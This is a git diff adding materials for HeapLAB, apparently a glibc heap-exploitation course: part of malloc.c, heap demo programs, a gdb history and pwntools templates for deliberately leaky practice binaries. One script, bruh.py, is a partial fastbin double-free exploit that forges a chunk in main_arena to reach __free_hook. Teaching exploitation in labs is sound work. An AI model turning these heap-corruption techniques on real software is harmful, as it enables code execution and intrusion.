+   {
+    void **ptr;
+
+    for (ptr = our_os_pools; ptr < &our_os_pools[MAX_POOL_ENTRIES]; ptr++)
+      if (*ptr)
+      {
+         PoolDeallocate(*ptr);
+ * ptr = 0;
+      }
+   }
+
+ */
+
+
+/* Helper code.  */
+
+extern char **__libc_argv attribute_hidden;
+
+static void
+malloc_printerr (const char *str)
+{
+  __libc_message (do_abort, "%s\n", str);
+  __builtin_unreachable ();
+}
+
+/* We need a wrapper function for one of the additions of POSIX.  */
+int
+__posix_memalign (void **memptr, size_t alignment, size_t size)
+{
+  void *mem;
+
+  /* Test whether the SIZE argument is valid.  It must be a power of
+     two multiple of sizeof (void *).  */
+  if (alignment % sizeof (void *) != 0
+      || !powerof2 (alignment / sizeof (void *))
+      || alignment == 0)
+    return EINVAL;
+
+
+  void *address = RETURN_ADDRESS (0);
+  mem = _mid_memalign (alignment, size, address);
+
+  if (mem != NULL)
+    {
+      *memptr = mem;
+      return 0;
+    }
+
+  return ENOMEM;
+}
+weak_alias (__posix_memalign, posix_memalign)
+
+
+int
+__malloc_info (int options, FILE *fp)
+{
+  /* For now, at least.  */
+  if (options != 0)
+    return EINVAL;
+
+  int n = 0;
+  size_t total_nblocks = 0;
+  size_t total_nfastblocks = 0;
+  size_t total_avail = 0;
+  size_t total_fastavail = 0;
+  size_t total_system = 0;
+  size_t total_max_system = 0;
+  size_t total_aspace = 0;
+  size_t total_aspace_mprotect = 0;
+
+
+
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  fputs ("<malloc version=\"1\">\n", fp);
+
+  /* Iterate over all arenas currently in use.  */
+  mstate ar_ptr = &main_arena;
+  do
+    {
+      fprintf (fp, "<heap nr=\"%d\">\n<sizes>\n", n++);
+
+      size_t nblocks = 0;
+      size_t nfastblocks = 0;
+      size_t avail = 0;
+      size_t fastavail = 0;
+      struct
+      {
+	size_t from;
+	size_t to;
+	size_t total;
+	size_t count;
+      } sizes[NFASTBINS + NBINS - 1];
+#define nsizes (sizeof (sizes) / sizeof (sizes[0]))
+
+      __libc_lock_lock (ar_ptr->mutex);
+
+      /* Account for top chunk.  The top-most available chunk is
+	 treated specially and is never in any bin. See "initial_top"
+	 comments.  */
+      avail = chunksize (ar_ptr->top);
+      nblocks = 1;  /* Top always exists.  */
+
+      for (size_t i = 0; i < NFASTBINS; ++i)
+	{
+	  mchunkptr p = fastbin (ar_ptr, i);
+	  if (p != NULL)
+	    {
+	      size_t nthissize = 0;
+	      size_t thissize = chunksize (p);
+
+	      while (p != NULL)
+		{
+		  ++nthissize;
+		  p = p->fd;
+		}
+
+	      fastavail += nthissize * thissize;
+	      nfastblocks += nthissize;
+	      sizes[i].from = thissize - (MALLOC_ALIGNMENT - 1);
+	      sizes[i].to = thissize;
+	      sizes[i].count = nthissize;
+	    }
+	  else
+	    sizes[i].from = sizes[i].to = sizes[i].count = 0;
+
+	  sizes[i].total = sizes[i].count * sizes[i].to;
+	}
+
+
+      mbinptr bin;
+      struct malloc_chunk *r;
+
+      for (size_t i = 1; i < NBINS; ++i)
+	{
+	  bin = bin_at (ar_ptr, i);
+	  r = bin->fd;
+	  sizes[NFASTBINS - 1 + i].from = ~((size_t) 0);
+	  sizes[NFASTBINS - 1 + i].to = sizes[NFASTBINS - 1 + i].total
+					  = sizes[NFASTBINS - 1 + i].count = 0;
+
+	  if (r != NULL)
+	    while (r != bin)
+	      {
+		size_t r_size = chunksize_nomask (r);
+		++sizes[NFASTBINS - 1 + i].count;
+		sizes[NFASTBINS - 1 + i].total += r_size;
+		sizes[NFASTBINS - 1 + i].from
+		  = MIN (sizes[NFASTBINS - 1 + i].from, r_size);
+		sizes[NFASTBINS - 1 + i].to = MAX (sizes[NFASTBINS - 1 + i].to,
+						   r_size);
+
+		r = r->fd;
+	      }
+
+	  if (sizes[NFASTBINS - 1 + i].count == 0)
+	    sizes[NFASTBINS - 1 + i].from = 0;
+	  nblocks += sizes[NFASTBINS - 1 + i].count;
+	  avail += sizes[NFASTBINS - 1 + i].total;
+	}
+
+      size_t heap_size = 0;
+      size_t heap_mprotect_size = 0;
+      size_t heap_count = 0;
+      if (ar_ptr != &main_arena)
+	{
+	  /* Iterate over the arena heaps from back to front.  */
+	  heap_info *heap = heap_for_ptr (top (ar_ptr));
+	  do
+	    {
+	      heap_size += heap->size;
+	      heap_mprotect_size += heap->mprotect_size;
+	      heap = heap->prev;
+	      ++heap_count;
+	    }
+	  while (heap != NULL);
+	}
+
+      __libc_lock_unlock (ar_ptr->mutex);
+
+      total_nfastblocks += nfastblocks;
+      total_fastavail += fastavail;
+
+      total_nblocks += nblocks;
+      total_avail += avail;
+
+      for (size_t i = 0; i < nsizes; ++i)
+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "\
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.src/demo_fastbins.c b/HeapLAB/.src/demo_fastbins.c
new file mode 100644
index 0000000..a50aa1f
--- /dev/null
+++ b/HeapLAB/.src/demo_fastbins.c
@@ -0,0 +1,19 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
+
+    void* a = malloc(1);
+    void* b = malloc(1);
+    void* c = malloc(1);
+
+    free(a);
+    free(b);
+    free(c);
+
+    void* d = malloc(1);
+    void* e = malloc(1);
+    void* f = malloc(1);
+
+    return 0;
+}
diff --git a/HeapLAB/.src/demo_top_chunk.c b/HeapLAB/.src/demo_top_chunk.c
new file mode 100644
index 0000000..d8e9767
--- /dev/null
+++ b/HeapLAB/.src/demo_top_chunk.c
@@ -0,0 +1,14 @@
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
+
+    void* a = malloc(9);
+
+    malloc(1);
+    malloc(0);
+
+    malloc(24);
+    malloc(25);
+
+    return 0;
+}
diff --git a/HeapLAB/.src/demo_unsortedbin.c b/HeapLAB/.src/demo_unsortedbin.c
new file mode 100644
index 0000000..1bfcc9e
--- /dev/null
+++ b/HeapLAB/.src/demo_unsortedbin.c
@@ -0,0 +1,16 @@
+#include <stdlib.h>
+
+int main(int argc, char* argv[]) {
+    void* a = malloc(0x88);
+    void* b = malloc(0x88);
+
+    free(b);
+
+    b = malloc(0x88);
+    malloc(0x18);
+
+    free(a);
+    free(b);
+
+    return 0;
+}
diff --git a/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf b/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf
new file mode 100644
index 0000000..41b2d41
Binary files /dev/null and b/HeapLAB/HeapLab - GLIBC Heap Exploitation.pdf differ
diff --git a/HeapLAB/challenge-fastbin_dup/.gdb_history b/HeapLAB/challenge-fastbin_dup/.gdb_history
new file mode 100644
index 0000000..b2cbfcb
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/.gdb_history
@@ -0,0 +1,256 @@
+x &main_arena
+x/100x &main_arena
+print main_arena
+fastbins
+q
+fastbins
+fastbins
+c
+exit
+quit
+quit
+fastbins
+print main_arena
+q
+print main_arena
+q
+vis_heap_chunks 
+print main_arena
+db main_arena
+db &main_arena
+db &main_arena/100
+db &main_arena 100
+db &main_arena 1000
+x main_arena.top
+x &main_arena.top
+db &main_arena 100
+c
+fastbins
+print main_arena
+x main_arena.fasbinsY
+x &main_arena.fastbinsY
+quit
+fastbins
+x 0x7f0946700b70
+db 0x7f0946700b70 100
+q
+fastbins
+q
+fastbins
+q
+fastbinsx
+db &main_arena 100
+q
+db 0x7f2e5c845b60
+0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70 + 16
+x 0x7f2e5c845b70
+x 0x7f2e5c845b70
+x 0x7f2e5c845b60
+vis_heap_chunks 
+db 0x7f0ba6e3db70
+db 0x555bdeaca000 100
+db 0x7f0ba6e3db70
+db 0x7f0ba6e3db70 - 8
+db 0x7f0ba6e3db70-8
+db 0x7f0ba6e3db70-7
+q
+x 0x7fcf882cbb69
+db 0x7fcf882cbb69
+q
+vis_heap_chunks 
+print main_arena
+q
+print main_arena
+vis_heap_chunks 
+q
+print main_arena 
+q
+print main_arena 
+fastbins
+r
+q
+r
+c
+fastbisn
+vis_heap_chunks 
+fastbins
+quit
+fastbins
+print main_arena 
+c
+print main_arena 
+q
+print main_arena 
+print main_arena 
+x malloc_free_hook
+x __free_hook
+x &__free_hook
+x &__free_hook 100
+db &__free_hook 100
+q
+q
+q
+q
+print main_arena 
+db 0x7f4858584e10
+c
+print victim
+q
+fastbins
+c
+x idx
+x chunksize(p)
+x chunksize
+x p
+fastbins
+q
+x __free_hook 
+x &__free_hook 100
+db &__free_hook 100
+db &__free_hook - 100
+db &__free_hook-100
+db &__free_hook-100 100
+print main_arena 
+x 0x7fca0f75fe10
+x/100 0x7fca0f75fe10
+x/100 0x7fca0f75fe10-100
+c
+q
+break malloc
+c
+fastbins
+x __free_hook 
+fastins
+fastbins
+print main_arena 
+x 0x7f072b59ee10
+break malloc
+break free
+continue
+c
+c
+c
+print main_arena
+vis_heap_chunks 
+vis_heap_chunks 
+c
+vis_heap_chunks 
+break free
+break malloc
+c
+print main_arena
+x &__free_hook - 16
+q
+print main_arena
+vis_heap_chunks 
+c
+c
+c
+q
+db __malloc_hook
+db &__malloc_hook
+x __malloc_hook
+x &__malloc_hook
+c
+break sysmalloc
+c
+frame 2
+context
+c
+break main
+c
+q
+x &__malloc_hook
+print __malloc_hook
+print &__malloc_hook
+print __main_arena
+print main_arena
+print main_arena 
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook
+db &__malloc_hook-100 100
+db &__malloc_hook-100 100*8
+db &__malloc_hook-100 (100*8)+1
+fastbins
+c
+print main_arena
+x __malloc_hook
+x &__malloc_hook
+db &__malloc_hook-100 (100*8)+1
+c
+db &__malloc_hook-100 (100*8)+1
+print main_arena
+x 0x7f5b07a18b40
+break malloc
+c
+c
+c
+q
+break __libc_malloc 
+break malloc
+break __malloc_hook
+b __malloc_hook 
+b &__malloc_hook 
+b *__malloc_hook 
+b *&__malloc_hook 
+c
+delete 3
+c
+pwndbg heap
+vis_heap_chunks 
+print __mallinfo
+x __mallinfo
+print  &__mallinfo
+print  *__mallinfo
+print  __mallinfo
+print &__mallinfo
+print main_arena
+c
+break malloc
+c
+x main_arena.top_check
+x main_arena.top_chunk
+print main_arena
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+fastbins
+c
+x 0x7f4854db6b40
+c
+x 0x7f4854db6b40
+x main_arena
+x &main_arena
+x &__malloc_hook
+x main_arena.top
+db main_arena.top
+c
+c
+c
+q
+print __malloc_hook
+print __malloc_hook 
+fastbins
+c
+fastbins
+c
+vis_heap_chunks 
+c
+fastbins
+r
+c
+fastbins
+print main_arena
+vis_heap
+c
+fastbins
+fastbins
+c
+fastbins
+r
+c
+ quit
diff --git a/HeapLAB/challenge-fastbin_dup/bruh.py b/HeapLAB/challenge-fastbin_dup/bruh.py
new file mode 100755
index 0000000..191cbea
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/bruh.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+context.terminal = ['kitty', 'bash', '-c']
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+#13 chunks
+
+chunk1 = malloc(24, 'abcd')
+chunk2 = malloc(24, 'abcc')
+
+free(chunk1)
+free(chunk2)
+free(chunk1)
+
+#malloc(24, p64(libc.sym.main_arena + 96))
+#this sets up a fake size field in the fastbins
+malloc(24, p64(0x81))
+malloc(24, 'asdf')
+malloc(24, 'asdf')
+
+chunk_b1 = malloc(119, 'asdf')
+chunk_b2 = malloc(119, 'asdf')
+
+free(chunk_b1)
+free(chunk_b2)
+free(chunk_b1)
+
+fake_chunk_loc = libc.sym.main_arena + 8 # begining of fastbin array
+
+malloc(119, p64(fake_chunk_loc))
+malloc(119, 'asdf')
+malloc(119, 'sdfg')
+
+#8 * 9
+
+malloc(119, p64(0)*9 + p64(libc.sym.__free_hook - 16))
+
+print(hex(fake_chunk_loc)) 
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2
new file mode 100755
index 0000000..faa0249
Binary files /dev/null and b/HeapLAB/challenge-fastbin_dup/fastbin_dup_2 differ
diff --git a/HeapLAB/challenge-fastbin_dup/pwntools_template.py b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..1faaaf8
--- /dev/null
+++ b/HeapLAB/challenge-fastbin_dup/pwntools_template.py
@@ -0,0 +1,60 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup_2")
+libc = elf.libc
+
+#gs = '''
+#continue
+#'''
+gs = '''
+break main
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request two 0x50-sized chunks.
+chunk_A = malloc(0x48, "A"*8)
+chunk_B = malloc(0x48, "B"*8)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/challenge-one_byte/one_byte b/HeapLAB/challenge-one_byte/one_byte
new file mode 100755
index 0000000..696030a
Binary files /dev/null and b/HeapLAB/challenge-one_byte/one_byte differ
diff --git a/HeapLAB/challenge-one_byte/pwntools_template.py b/HeapLAB/challenge-one_byte/pwntools_template.py
new file mode 100755
index 0000000..d49da15
--- /dev/null
+++ b/HeapLAB/challenge-one_byte/pwntools_template.py
@@ -0,0 +1,80 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("one_byte")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option.
+# Returns chunk index.
+def malloc():
+    global index
+    io.sendthen("> ", "1")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("3")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "read" option; read 0x58 bytes.
+def read(index):
+    io.send("4")
+    io.sendafter("index: ", f"{index}")
+    r = io.recv(0x58)
+    io.recvuntil("> ")
+    return r
+
+io = start()
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request a chunk.
+chunk_A = malloc()
+
+# Edit chunk A.
+edit(chunk_A, b"Y"*32)
+
+# Read data from chunk A.
+data = read(chunk_A)
+log.info(f"Read from chunk_A:\n{data}")
+
+# Free chunk A.
+free(chunk_A)
+
+# Because you haven't leaked a libc address yet, libc.sym.<symbol name>
+# will only print a symbol's offset, rather than its actual address.
+log.info(f"offset of puts() from start of GLIBC shared object: 0x{libc.sym.puts:02x}")
+
+# Once you've leaked an address, e.g. the printf() function, use:
+# libc.sym.address = <leaked printf address> - libc.sym.printf
+# to correctly set your libc base address to its runtime address. Now future calls
+# to libc.sym will use the symbol's actual address rather than its offset.
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/fastbin_dup/demo b/HeapLAB/fastbin_dup/demo
new file mode 100755
index 0000000..93847ad
Binary files /dev/null and b/HeapLAB/fastbin_dup/demo differ
diff --git a/HeapLAB/fastbin_dup/fastbin_dup b/HeapLAB/fastbin_dup/fastbin_dup
new file mode 100755
index 0000000..7332ab1
Binary files /dev/null and b/HeapLAB/fastbin_dup/fastbin_dup differ
diff --git a/HeapLAB/fastbin_dup/pwntools_template.py b/HeapLAB/fastbin_dup/pwntools_template.py
new file mode 100755
index 0000000..294ab15
--- /dev/null
+++ b/HeapLAB/fastbin_dup/pwntools_template.py
@@ -0,0 +1,62 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("fastbin_dup")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size & data.
+# Returns chunk index.
+def malloc(size, data):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Set the username field.
+username = "George"
+io.sendafter("username: ", username)
+io.recvuntil("> ")
+
+# Request two 0x30-sized chunks and fill them with data.
+chunk_A = malloc(0x28, "A"*0x28)
+chunk_B = malloc(0x28, "B"*0x28)
+
+# Free the first chunk, then the second.
+free(chunk_A)
+free(chunk_B)
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/house_of_force/demo b/HeapLAB/house_of_force/demo
new file mode 100755
index 0000000..1384ebd
Binary files /dev/null and b/HeapLAB/house_of_force/demo differ
diff --git a/HeapLAB/house_of_force/house_of_force b/HeapLAB/house_of_force/house_of_force
new file mode 100755
index 0000000..5cdd95f
Binary files /dev/null and b/HeapLAB/house_of_force/house_of_force differ
diff --git a/HeapLAB/house_of_force/pwntools_template.py b/HeapLAB/house_of_force/pwntools_template.py
new file mode 100755
index 0000000..22d980b
--- /dev/null
+++ b/HeapLAB/house_of_force/pwntools_template.py
@@ -0,0 +1,58 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("house_of_force")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Select the "malloc" option, send size & data.
+def malloc(size, data):
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Calculate the "wraparound" distance between two addresses.
+def delta(x, y):
+    return (0xffffffffffffffff - x) + y
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# The "heap" variable holds the heap start address.
+log.info(f"heap: 0x{heap:02x}")
+
+# Program symbols are available via "elf.sym.<symbol name>".
+log.info(f"target: 0x{elf.sym.target:02x}")
+
+# The malloc() function chooses option 1 from the menu.
+# Its arguments are "size" and "data".
+malloc(24, b"Y"*24)
+
+# The delta() function finds the "wraparound" distance between two addresses.
+log.info(f"delta between heap & main(): 0x{delta(heap, elf.sym.main):02x}")
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/house_of_orange/house_of_orange b/HeapLAB/house_of_orange/house_of_orange
new file mode 100755
index 0000000..467a19e
Binary files /dev/null and b/HeapLAB/house_of_orange/house_of_orange differ
diff --git a/HeapLAB/house_of_orange/pwntools_template.py b/HeapLAB/house_of_orange/pwntools_template.py
new file mode 100755
index 0000000..60dc183
--- /dev/null
+++ b/HeapLAB/house_of_orange/pwntools_template.py
@@ -0,0 +1,61 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("house_of_orange")
+libc = elf.libc
+
+gs = '''
+set breakpoint pending on
+break _IO_flush_all_lockp
+enable breakpoints once 1
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Select the "malloc (small)" option.
+def small_malloc():
+    io.send("1")
+    io.recvuntil("> ")
+
+# Select the "malloc (large)" option.
+def large_malloc():
+    io.sendthen("> ", "2")
+
+# Select the "edit (1st small chunk)" option; send data.
+def edit(data):
+    io.send("3")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+io.recvuntil("> ")
+io.timeout = 0.1
+
+# =============================================================================
+
+# =-=-=- EXAMPLE -=-=-=
+
+# Request a small chunk.
+small_malloc()
+
+# Edit the 1st small chunk.
+edit(b"Y"*24)
+
+# Request a large chunk.
+large_malloc()
+
+# =============================================================================
+
+io.interactive()
diff --git a/HeapLAB/malloc_testbed/.links/ld.so.2 b/HeapLAB/malloc_testbed/.links/ld.so.2
new file mode 120000
index 0000000..d9768f8
--- /dev/null
+++ b/HeapLAB/malloc_testbed/.links/ld.so.2
@@ -0,0 +1 @@
+../../.glibc/glibc_2.27/ld.so.2
\ No newline at end of file
diff --git a/HeapLAB/malloc_testbed/.links/libc.so.6 b/HeapLAB/malloc_testbed/.links/libc.so.6
new file mode 120000
index 0000000..2635a93
--- /dev/null
+++ b/HeapLAB/malloc_testbed/.links/libc.so.6
@@ -0,0 +1 @@
+../../.glibc/glibc_2.27/libc.so.6
\ No newline at end of file
diff --git a/HeapLAB/malloc_testbed/change_glibc_version.py b/HeapLAB/malloc_testbed/change_glibc_version.py
new file mode 100755
index 0000000..2ce1abc
--- /dev/null
+++ b/HeapLAB/malloc_testbed/change_glibc_version.py
@@ -0,0 +1,30 @@
+#!/usr/bin/python3
+import os
+
+# Grab available GLIBC versions.
+available_versions = []
+for item in os.scandir("../.glibc"):
+    if item.is_dir():
+        available_versions.append(item)
+available_versions.sort(key=lambda x:x.name)
+
+# Print menu.
+print("\n--------------------")
+print("Select GLIBC version")
+print("--------------------")
+for c, version in enumerate(available_versions):
+    print(f"{c:02}) " + version.name)
+
+# Process input.
+choice = int(input("> "))
+if choice < len(available_versions):
+    # Remove old symlinks.
+    try:
+        os.unlink(".links/libc.so.6")
+        os.unlink(".links/ld.so.2")
+    except FileNotFoundError:
+        print("No old links to remove")
+
+    # Replace symlinks.
+    os.symlink("../" + available_versions[choice].path + "/libc.so.6", ".links/libc.so.6")
+    os.symlink("../" + available_versions[choice].path + "/ld.so.2", ".links/ld.so.2")
diff --git a/HeapLAB/malloc_testbed/malloc_testbed b/HeapLAB/malloc_testbed/malloc_testbed
new file mode 100755
index 0000000..3dad712
Binary files /dev/null and b/HeapLAB/malloc_testbed/malloc_testbed differ
diff --git a/HeapLAB/malloc_testbed/pwntools_template.py b/HeapLAB/malloc_testbed/pwntools_template.py
new file mode 100755
index 0000000..2d6f220
--- /dev/null
+++ b/HeapLAB/malloc_testbed/pwntools_template.py
@@ -0,0 +1,97 @@
+#!/usr/bin/python3
+from pwn import *
+
+elf = context.binary = ELF("malloc_testbed")
+libc = elf.libc
+
+gs = '''
+continue
+'''
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gdbscript=gs)
+    else:
+        return process(elf.path)
+
+# Index of allocated chunks.
+index = 0
+
+# Select the "malloc" option; send size.
+# Return chunk index.
+def malloc(size):
+    global index
+    io.send("1")
+    io.sendafter("size: ", f"{size}")
+    io.recvuntil("> ")
+    index += 1
+    return index - 1
+
+# Select the "free" option; send index.
+def free(index):
+    io.send("2")
+    io.sendafter("index: ", f"{index}")
+    io.recvuntil("> ")
+
+# Select the "free address" option; send address.
+def free_address(address):
+    io.send("3")
+    io.sendafter("address: ", f"{address}")
+    io.recvuntil("> ")
+
+# Select the "edit" option; send index & data.
+def edit(index, data):
+    io.send("4")
+    io.sendafter("index: ", f"{index}")
+    io.sendafter("data: ", data)
+    io.recvuntil("> ")
+
+# Select the "read" option; send index.
+# Return data from read operation.
+def read(index):
+    io.send("5")
+    io.sendafter("index: ", f"{index}")
+    r = io.recvuntil("\n1) malloc", drop=True)
+    io.recvuntil("> ")
+    return r
+
+io = start()
+
+# This binary leaks the address of puts(), use it to resolve the libc load address.
+io.recvuntil("puts() @ ")
+libc.address = int(io.recvline(), 16) - libc.sym.puts
+
+# This binary leaks the heap start address.
+io.recvuntil("heap @ ")
+heap = int(io.recvline(), 16)
+
